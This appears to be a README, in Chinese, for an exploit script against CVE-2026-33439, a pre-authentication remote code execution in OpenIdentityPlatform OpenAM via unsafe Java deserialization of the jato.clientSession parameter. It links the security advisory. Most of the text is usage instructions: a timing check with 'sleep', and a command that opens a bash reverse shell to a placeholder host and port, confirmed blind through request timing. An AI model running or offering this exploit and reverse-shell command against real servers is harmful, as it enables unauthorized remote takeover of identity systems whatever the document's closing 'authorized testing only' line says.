OpenIdentityPlatform OpenAM 中通过 jato.clientSession 参数的不安全 Java 反序列化实现的预认证 RCE。受影响版本 <= 16.0.5,已在 16.0.6 中修复。
安全公告:https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
输出为盲注。请求会阻塞直到命令退出,因此可通过计时确认执行(--command 'sleep 5' 大约耗时 5 秒)。
仅限授权安全测试使用。